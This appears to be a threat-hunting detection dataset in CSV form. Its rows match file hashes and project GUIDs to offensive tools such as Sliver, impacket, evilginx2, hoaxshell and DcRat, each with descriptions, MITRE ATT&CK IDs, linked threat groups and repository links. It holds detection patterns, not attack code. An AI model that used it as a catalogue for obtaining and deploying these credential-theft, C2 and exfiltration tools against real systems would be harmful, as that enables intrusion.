"*5c66b553237114b4d5f347969bc2321bdf916fda972e947dd7590640bc9f4ed5*",".{0,1000}5c66b553237114b4d5f347969bc2321bdf916fda972e947dd7590640bc9f4ed5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27419"
"*5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf*",".{0,1000}5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27422"
"*5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5*",".{0,1000}5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27423"
"*5c7e09b63bd99851d8b93241f3907917c07af3903aa024da0bd549ae1fc373f7*",".{0,1000}5c7e09b63bd99851d8b93241f3907917c07af3903aa024da0bd549ae1fc373f7.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","27424"
"*5c83e3984dc59f7fee94752fee3f1418b991f6929a21eb534e01c5264b517f41*",".{0,1000}5c83e3984dc59f7fee94752fee3f1418b991f6929a21eb534e01c5264b517f41.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27426"
"*5c85b965c19ff7f7742980f90965279aa0ae2ea4c50317ad7680b56d6e3ed9d5*",".{0,1000}5c85b965c19ff7f7742980f90965279aa0ae2ea4c50317ad7680b56d6e3ed9d5.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","27427"
"*5C87B2E6-8D24-4F1D-AB85-FC659F452AD0*",".{0,1000}5C87B2E6\-8D24\-4F1D\-AB85\-FC659F452AD0.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","27428"
"*5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472*",".{0,1000}5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27430"
"*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27431"
"*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27432"
"*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27433"
"*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27434"
"*5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f*",".{0,1000}5c92c2a54210a27db9c368ccdf870dce532bcb272d61bf12d8c5b43da64ee46f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27435"
"*5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d*",".{0,1000}5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27436"
"*5c9ce953e49bb74ead6c093ada4159c244082732eb00e00dd526e2edb0c820d4*",".{0,1000}5c9ce953e49bb74ead6c093ada4159c244082732eb00e00dd526e2edb0c820d4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27437"
"*5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422*",".{0,1000}5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27438"
"*5cac558b724fafdcac0b946daabc39ca78154142a408b62fb59db5655f07e139*",".{0,1000}5cac558b724fafdcac0b946daabc39ca78154142a408b62fb59db5655f07e139.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27440"
"*5cadf4e7a35d191850cb6587b934ab191b781c9465d39bed7b0ae46f173ed43d*",".{0,1000}5cadf4e7a35d191850cb6587b934ab191b781c9465d39bed7b0ae46f173ed43d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27441"
"*5cb5931045705f9c78923247204bbca0f6b7bc4825af11bb053b7e4297e23f8d*",".{0,1000}5cb5931045705f9c78923247204bbca0f6b7bc4825af11bb053b7e4297e23f8d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27442"
"*5cbfbb972be8b3611722c133a87a7771f871f5cd6f10f1d2cf3043a2c3c11cd3*",".{0,1000}5cbfbb972be8b3611722c133a87a7771f871f5cd6f10f1d2cf3043a2c3c11cd3.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","27443"
"*5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7*",".{0,1000}5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","27444"
"*5ccf7538e23279696252e4ff25a453d2e3693c76d5c2ffce705e8b9b8c1fe1b5*",".{0,1000}5ccf7538e23279696252e4ff25a453d2e3693c76d5c2ffce705e8b9b8c1fe1b5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27445"
"*5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6*",".{0,1000}5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27446"
"*5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1*",".{0,1000}5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","27447"
"*5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243*",".{0,1000}5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","27448"
"*5ce161bd3a1804cb6265d0d79615bcf9dc3b115ffe85011638de46e4b16c68dc*",".{0,1000}5ce161bd3a1804cb6265d0d79615bcf9dc3b115ffe85011638de46e4b16c68dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27449"
"*5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce*",".{0,1000}5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","27450"
"*5cee697909834727bc7a7531b6e32defd302d40a7643fda5ff9877e24e60d4bf*",".{0,1000}5cee697909834727bc7a7531b6e32defd302d40a7643fda5ff9877e24e60d4bf.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27452"
"*5CF031648822442C641F601094E922898DFA3D93C8D0B3E44FBCE22F43E7E402*",".{0,1000}5CF031648822442C641F601094E922898DFA3D93C8D0B3E44FBCE22F43E7E402.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27453"
"*5cf784da346a55c15259f755ffc19790a90cd616449a47bb9617cf93bfe91441*",".{0,1000}5cf784da346a55c15259f755ffc19790a90cd616449a47bb9617cf93bfe91441.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","27455"
"*5cf800056e1db3399b0f3dd19eed7c0ae2c187816c2a0e0da36191154726fb38*",".{0,1000}5cf800056e1db3399b0f3dd19eed7c0ae2c187816c2a0e0da36191154726fb38.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","27456"
"*5cfbfbbb44fe784e5501694e37afd9df87e8d7f7bdc48a5de347e7b33bdba94e*",".{0,1000}5cfbfbbb44fe784e5501694e37afd9df87e8d7f7bdc48a5de347e7b33bdba94e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27457"
"*5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239*",".{0,1000}5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27458"
"*5D01A326-0357-4C3F-A196-3B8B866C9613*",".{0,1000}5D01A326\-0357\-4C3F\-A196\-3B8B866C9613.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27459"
"*5d03288b02fce093ba94dd2933cfbaccdaa378bb8c38e64d14956dfb7601928c*",".{0,1000}5d03288b02fce093ba94dd2933cfbaccdaa378bb8c38e64d14956dfb7601928c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27460"
"*5D03EFC2-72E9-4410-B147-0A1A5C743999*",".{0,1000}5D03EFC2\-72E9\-4410\-B147\-0A1A5C743999.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#GUIDproject","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","27461"
"*5d05813d5d30a6660ff8c5a0f62e82c8843f20e07789001a9bb9cfc4b09e9649*",".{0,1000}5d05813d5d30a6660ff8c5a0f62e82c8843f20e07789001a9bb9cfc4b09e9649.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27462"
"*5d08513f61d4172dee626b3287b4f6a9f8eece9fa1a8bfcfc11e85fb9b3d3bff*",".{0,1000}5d08513f61d4172dee626b3287b4f6a9f8eece9fa1a8bfcfc11e85fb9b3d3bff.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27463"
"*5D10ED0A-6C52-49FE-90F5-CFAAECA8FABE*",".{0,1000}5D10ED0A\-6C52\-49FE\-90F5\-CFAAECA8FABE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27465"
"*5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf*",".{0,1000}5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27466"
"*5d17e9dd54752bf9071caeccace27123897fe33de26db8c6f3e544abd11f7cb2*",".{0,1000}5d17e9dd54752bf9071caeccace27123897fe33de26db8c6f3e544abd11f7cb2.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","27467"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27471"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27472"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27473"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27474"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27475"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27476"
"*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27477"
